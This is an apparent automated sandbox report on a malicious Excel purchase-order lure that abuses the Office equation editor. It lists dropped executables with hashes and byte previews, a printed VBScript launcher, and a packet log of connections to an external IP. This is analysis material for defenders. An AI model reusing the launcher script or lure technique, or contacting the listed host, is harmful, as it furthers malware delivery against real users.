                                              Preview:EA06..t0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...
                                              Process:C:\Users\user\AppData\Roaming\negrett.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):229888
                                              Entropy (8bit):7.853527489682686
                                              Encrypted:false
                                              SSDEEP:6144:odtxFqcDNpdmmp0IrlESm1KN0uMJQ3NJnEI/X0SEL:aFjJpdoQWSQKcJQ9NZEL
                                              MD5:CD95747202E22552AF28CF9D1B68988C
                                              SHA1:76DB6EDB8D98BD729ECC3A5B4A8C9419B40CDC8E
                                              SHA-256:CF71A48EA30F65F3C0F9F72774960C557D33C9C26A66CE31ACE95826C68F5149
                                              SHA-512:E0892060E7734CBF6D2DA1DA6E4B7CF743138D73A7A54985ADE51937ADCFF551FD300792E1FD4A5178A87AF4B75A8FC2AC4039952718406C62B76C8214228B3B
                                              Malicious:false
                                              Preview:.h.5WF0I7O7D.JK.8328JOB.D57D2J5TF0I3O7D4RJK98328JOBFD57D2J5.F0I=P.J4.C...2~.k.*/7.G6]-G5+.*R!Y+@r(..JF\.#!b..f.)].PzK=C.O7D4RJKQ(...;.<j5.IhC.KfeO7.>.:?..5.I.L.;.<.5.Iv.$KH7.7.l^:.#.5..HL.;.<.-V_hC.KTF0I3O7D4RJK9832[B.'FD57.wJ5.G4IG.7.4RJK9832.JlCME<7D.K5T.1I3O7D..JK9(328.NBFDu7D"J5TD0I6O7D4RJK<8328JOBF.67D6J5.}2I1O7.4RZK9(328J_BFT57D2J5DF0I3O7D4RJK.-12hJOBF$77.RK5TF0I3O7D4RJK98328JOBFD57..K5HF0I3O7D4RJK98328JOBFD57D2J5.K2IsO7D4RJK98328.NB.E57D2J5TF0I3O7D4RJK98328JOBh0PO02J5L.1I3_7D4.KK9<328JOBFD57D2J5tF0).=S%@3JK.U328.NBF*57D.K5TF0I3O7D4RJKy83r...6'D57..J5Tf2I3Y7D4XHK98328JOBFD57.2J.z4C;PO7D.2KK9X128(NBFd77D2J5TF0I3O7DtRJ.98328JOBFD57D2J5TF0I3O7D4RJK98328JOBFD57D2J5TF0I3O7D4RJK98328JOBFD57D2J5TF0I3O7D4RJK98328JOBFD57D2J5TF0I3O7D4RJK98328JOBFD57D2J5TF0I3O7D4RJK98328JOBFD57D2J5TF0I3O7D4RJK98328JOBFD57D2J5TF0I3O7D4RJK98328JOBFD57D2J5TF0I3O7D4RJK98328JOBFD57D2J5TF0I3O7D4RJK98328JOBFD57D2J5TF0I3O7D4RJK98328JOBFD57D2J5TF0I3O7D4RJK98328JOBFD57D2J5TF0I3O7D4RJK98328JOBFD57D2J5TF0I3O7D4RJK9832
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):165
                                              Entropy (8bit):1.4377382811115937
                                              Encrypted:false
                                              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                              MD5:797869BB881CFBCDAC2064F92B26E46F
                                              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                              Malicious:false
                                              Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Process:C:\Users\user\AppData\Roaming\negrett.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):109360640
                                              Entropy (8bit):7.999114117008018
                                              Encrypted:true
                                              SSDEEP:98304:mjTQYxsWRy8DIMSEOC9hd2pqP5MuerTQRXtb6JCJm:m3dxfiMzF2pqhZrK
                                              MD5:CF439A4CF698F8D15901A3CAA5F503FE
                                              SHA1:B31BEE62A6893370C78F8A7D92319180E1201FF8
                                              SHA-256:08934CC50B19DB7894D18CE045CFF85D884BA099801055D5062A667D4131C9B7
                                              SHA-512:2A1EBE1C4673AC2F626F1E9CA8E436D8B25EE7903EDB040B5A654114B7869626304238ED8C75EF00C52A25BE8D83632A78DE087BE7BA68B76D6D9CDFFACCF379
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...r.5f..........".................w.............@.......................................@...@.......@.....................d...|....@...J.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc....J...@...L..................@..@.reloc...u.......v...@..............@..B........................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\AppData\Local\directory\name.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):268
                                              Entropy (8bit):3.432515153875934
                                              Encrypted:false
                                              SSDEEP:6:DMM8lfm3OOQdUfcltr1UEZ+lX1Al1AE6nriIM8lfQVn:DsO+vNlZ1Q1A1z4mA2n
                                              MD5:56B963F73C0E43390FF3FF4D7A017676
                                              SHA1:3B13AC1CF25CDDF48309FC03DAE0C21E501BE72D
                                              SHA-256:894FD00EC8DF7058794232AEEB64467BC91FE4009F18FA1407E09E92444A9EE0
                                              SHA-512:38D55BAD2C2EB6C764D036238AC2E220B9444C98F41857799C2316B25AC8BB6C4500E43D362DFFFDF7583858D7C553CF2F11D38962F0BBEC7618B6FA6C71F9F8
                                              Malicious:true
                                              Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.d.i.r.e.c.t.o.r.y.\.n.a.m.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):1357312
                                              Entropy (8bit):6.788018216695586
                                              Encrypted:false
                                              SSDEEP:24576:uqDEvCTbMWu7rQYlBQcBiT6rprG8aj5OV969dMSEOQOTxK:uTvC/MTQYxsWR7aj5ODudMSEO
                                              MD5:FBCCDD35EE6DCCADAEAA69E37FBBD171
                                              SHA1:D076D0BE3A846AFCE258DEF238BF7EF5FE5CACD5
                                              SHA-256:A0EAE98F6ADB6DD377456733EEDC98A453211B456E7F934818B584CCC74B1DE3
                                              SHA-512:A106A75FFC8042ECE8AC3E32F1BF2534C56C917F1540288C9685FDB9B832BE8CE8DAD4CDE914165C477A3ED0153FEFC92E3ED1119B8EED340E85D0A3538BF791
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...r.5f..........".................w.............@.......................................@...@.......@.....................d...|....@...J.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc....J...@...L..................@..@.reloc...u.......v...@..............@..B........................................................................................................................................................................................................................................................................
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):165
                                              Entropy (8bit):1.4377382811115937
                                              Encrypted:false
                                              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                              MD5:797869BB881CFBCDAC2064F92B26E46F
                                              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                              Malicious:false
                                              Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):165
                                              Entropy (8bit):1.4377382811115937
                                              Encrypted:false
                                              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                              MD5:797869BB881CFBCDAC2064F92B26E46F
                                              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                              Malicious:false
                                              Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              File type:Microsoft Excel 2007+
                                              Entropy (8bit):7.99835331125079
                                              TrID:
                                              • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                              • ZIP compressed archive (8000/1) 16.67%
                                              File name:Orden de compra 0001-00255454.xlam.xlsx
                                              File size:718'272 bytes
                                              MD5:a2e67a3d40ebd7f8872ebb1dda01aba9
                                              SHA1:27feddfa7d771ff519757beaac8c974330e14e1d
                                              SHA256:5242cb2077f21596ec657daf5b6c45087259b85708f959f22b2490d1a381dd36
                                              SHA512:fcfba9a8f909a1aeeb04c342840c6a2f61372d499841394b4d4d266e5589647fe6c1197d004b73a3b988c12f0bc3620c22715fcd094a5f678d1a882ac963ded0
                                              SSDEEP:12288:CrGgQXUKPBgmjlmVHfJprHevIGF3ZIM7NWSgCRIf0jKH2t8EgfWEicCokPyw58qs:uhKPB1U5eg6ZL7NWSV3gfkJokPywLB6/
                                              TLSH:5EE433874EB21459EF898511C296AC3AA27F333FDA4013F729FFCB25452A489C1ED746
                                              File Content Preview:PK...........XOZ]n....E.......[Content_Types].xmlUT...d.5fd.5fd.5f...n.0..........t.b(......@...%&V#K......v.`...Ar.a..~..wz..|..L..Z]V.U`0..........*.!X.1`.6H.......&!.R..V-s...L..P.....c...3/t.........610....P7.{....b...['........ZAJ..`..U..@.8.;.6..NJ*
                                              Icon Hash:2562ab89a7b7bfbf
                                              Document Type:OpenXML
                                              Number of OLE Files:1
                                              Has Summary Info:
                                              Application Name:
                                              Encrypted Document:False
                                              Contains Word Document Stream:False
                                              Contains Workbook/Book Stream:False
                                              Contains PowerPoint Document Stream:False
                                              Contains Visio Document Stream:False
                                              Contains ObjectPool Stream:False
                                              Flash Objects Count:0
                                              Contains VBA Macros:False
                                              Author:Mancilla, Jesus
                                              Last Saved By:USER
                                              Total Edit Time:0
                                              Create Time:2022-08-10T18:51:50Z
                                              Last Saved Time:2023-08-08T20:02:56Z
                                              Creating Application:Microsoft Excel
                                              Security:0
                                              Thumbnail Scaling Desired:false
                                              Company:
                                              Contains Dirty Links:false
                                              Shared Document:false
                                              Changed Hyperlinks:false
                                              Application Version:16.0300
                                              General
                                              Stream Path:\x1OLE10NaTIVE
                                              CLSID:
                                              File Type:data
                                              Stream Size:1019488
                                              Entropy:5.890458556459559
                                              Base64 Encoded:False
                                              Data ASCII:. y . . . . . | 1 S . . + . . s b B > U . . 4 . A ] 3 2 . D . A 9 h . . . R I t . 9 . i X I ? . x . M ] B . . 4 | . . . V / q Y * . c [ 2 ^ 0 ! P g & ! L U . H . _ b s y . ' . . b J 5 & [ . . Z # . K . , . R | . N @ p e y s { # ^ ; f _ x W ; ! % - . ~ u . R ! . ] H S . . _ ? . . . . ~ ) . . . | M t U H + . { ^ b . W G % M . = . 7 . . . . N Z 4 H c " . . e . . / % \\ F . D . s . z ~ - . K B ' # . a X 8 . . Y < H . k . 3 . % . Q - R . . \\ u I $ 2 . 6 . u 6 4 s 5 T . . _ T i k . X . . ' J . . e u L e P .
                                              Data Raw:0e 79 d6 03 02 94 a2 18 86 c7 01 08 9d 8f be 7c 31 f2 fd 81 c6 c0 8b 53 02 8b 1e 8b 2b be c8 04 04 73 81 c6 e8 62 42 8d 8b 3e 55 ff d7 05 de a3 cc 34 05 41 5d 33 cb ff e0 32 1d ca 44 00 ae 41 e8 82 e5 c6 39 68 1f 9e da 0d b4 a8 01 95 52 49 74 e9 1a 39 ed b0 88 dd d4 2e 88 da 69 58 49 94 3f 04 be c8 c9 f1 fe 91 78 0e 4d cc 5d 42 0a f5 01 a0 cc 34 93 ca 7c c9 11 cf 11 a5 98 7f 56 2f
                                              General
                                              Stream Path:kIGXMKpAnNtXCm1GrVwWIsB0Ud5
                                              CLSID:
                                              File Type:empty
                                              Stream Size:0
                                              Entropy:0.0
                                              Base64 Encoded:False
                                              Data ASCII:
                                              Data Raw:
                                              TimestampSource PortDest PortSource IPDest IP
                                              May 4, 2024 10:09:29.019311905 CEST4916380192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:29.331157923 CEST804916338.242.255.115192.168.2.22
                                              May 4, 2024 10:09:29.331232071 CEST4916380192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:29.331490993 CEST4916380192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:29.643115044 CEST804916338.242.255.115192.168.2.22
                                              May 4, 2024 10:09:29.643255949 CEST804916338.242.255.115192.168.2.22
                                              May 4, 2024 10:09:29.643333912 CEST4916380192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:29.651585102 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:29.651639938 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:29.651705980 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:29.665791988 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:29.665811062 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:30.312975883 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:30.313184023 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:30.322016001 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:30.322036028 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:30.322438955 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:30.322495937 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:30.393388033 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:30.436130047 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:31.268598080 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:31.268663883 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:31.268703938 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:31.268714905 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:31.268781900 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:31.268794060 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:31.268860102 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:31.268915892 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:31.268970966 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:31.268989086 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:31.268994093 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:31.269018888 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:31.269031048 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:31.274445057 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:31.586555004 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:31.586604118 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:31.586673975 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:31.586684942 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:31.586697102 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:31.586715937 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:31.586740017 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:31.586746931 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:31.586757898 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:31.586764097 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:31.586807013 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:31.586901903 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:31.586941957 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:31.586971998 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:31.586977005 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:31.587014914 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:31.587049007 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:31.587965012 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:31.904247046 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:31.904299021 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:31.904592037 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:31.904624939 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:31.904658079 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:31.904694080 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:31.905461073 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:31.905509949 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:31.905514956 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:31.905524015 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:31.905554056 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:31.905599117 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:31.905639887 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:31.905647993 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:31.905652046 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:31.905684948 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:31.905849934 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:31.907037973 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:31.907080889 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:31.907104969 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:31.907113075 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:31.907129049 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:31.907150030 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:31.908077955 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:31.908154964 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:31.908195972 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:31.908202887 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:31.908206940 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:31.908240080 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:31.909545898 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.221962929 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.221976042 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.222016096 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.222136021 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.222158909 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.222176075 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.222220898 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.222266912 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.222537994 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.222580910 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.222584963 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.222590923 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.222618103 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.222634077 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.222721100 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.222759962 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.222764015 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.222769022 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.222810984 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.222887039 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.222925901 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.222927094 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.222937107 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.222966909 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.222976923 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.223607063 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.223645926 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.223691940 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.223691940 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.223702908 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.223732948 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.223747015 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.223788023 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.223826885 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.223829985 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.223834991 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.223865986 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.224492073 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.224531889 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.224541903 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.224549055 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.224571943 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.224586964 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.224721909 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.224767923 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.224772930 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.224781990 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.224819899 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.224934101 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.224973917 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.224980116 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.224984884 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.225028038 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.226056099 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.226099014 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.226108074 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.226114035 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.226135969 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.226154089 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.226241112 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.227173090 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.227227926 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.227236032 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.227245092 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.227284908 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.232387066 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.267081976 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.267144918 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.267334938 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.267334938 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.267366886 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.267385006 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.267415047 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.540961981 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.540977001 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.541019917 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.541208029 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.541208029 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.541208982 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.541224957 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.541239977 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.541286945 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.541309118 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.541313887 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.541378975 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.541939974 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.541980028 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.541994095 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.541999102 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.542023897 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.542037964 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.542423010 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.542469025 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.542469978 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.542478085 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.542515993 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.542541027 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.542751074 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.542792082 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.542800903 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.542805910 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.542839050 CEST49164443192.168.2.2238.242.255.115
                                              May 4, 2024 10:09:32.543132067 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.543178082 CEST4434916438.242.255.115192.168.2.22
                                              May 4, 2024 10:09:32.543184042 CEST49164443192.168.2.2238.242.255.115
